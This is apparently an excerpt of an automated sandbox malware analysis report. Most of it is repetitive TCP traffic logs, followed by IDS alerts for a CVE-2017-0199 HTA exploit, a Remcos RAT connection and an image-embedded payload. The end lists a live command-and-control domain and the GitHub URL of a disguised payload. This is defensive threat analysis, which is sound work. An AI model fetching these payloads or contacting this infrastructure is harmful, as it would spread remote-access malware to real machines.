                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 150.136.81.248:443
                  Source: global trafficTCP traffic: 150.136.81.248:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.40:80
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49164
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.220.40:80
                  Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49162
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 192.3.220.40:80
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 135.148.195.248:6875
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 135.148.195.248:6875
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49172
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.108.133:443 -> 192.168.2.22:49167
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 185.199.108.133:443 -> 192.168.2.22:49176
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: idabo.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: idabo.duckdns.org
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 135.148.195.248:6875
                  Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
